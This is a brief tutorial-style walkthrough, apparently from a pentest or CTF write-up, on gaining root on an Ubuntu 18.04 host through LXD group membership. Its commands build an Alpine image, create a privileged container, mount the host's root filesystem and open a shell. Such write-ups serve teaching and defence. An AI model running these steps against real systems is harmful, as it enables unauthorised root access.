Linux system environments running LXD are vulnerable to privilege escalation via multiple attack paths. Privilege escalation via LXD in general has been a known issue in Ubuntu system with a simple method, the only requirement for this exploit in a Linux system is access to a user account that is a member of the LXD group.
To check if the user is part of LXD group is simply as the command id.
The user is part of LXD group, and the host in this case is running Ubuntu 18.04 which is vulnerable to lxd ( searchsploit lxd ), so we going to download lxd-alpine-builder from here https://github.com/saghul/lxd-alpine-builder.git and follow these steps.
On our machine inside the lxd folder we run:
sudo ./build-alpine
sudo ./build-alpine -h
Then on the host machine we run this:
lxc image import alpine-v3.3-x86_64-20160114_2308.tar.gz –alias myimage
lxc image list
lxc init myimage hacker -c security.privileged=true
lxc config device add hacker mydevice disk source=/ path=/mnt/root recursive=true
lxc start hacker
lxc exec hacker /bin/sh
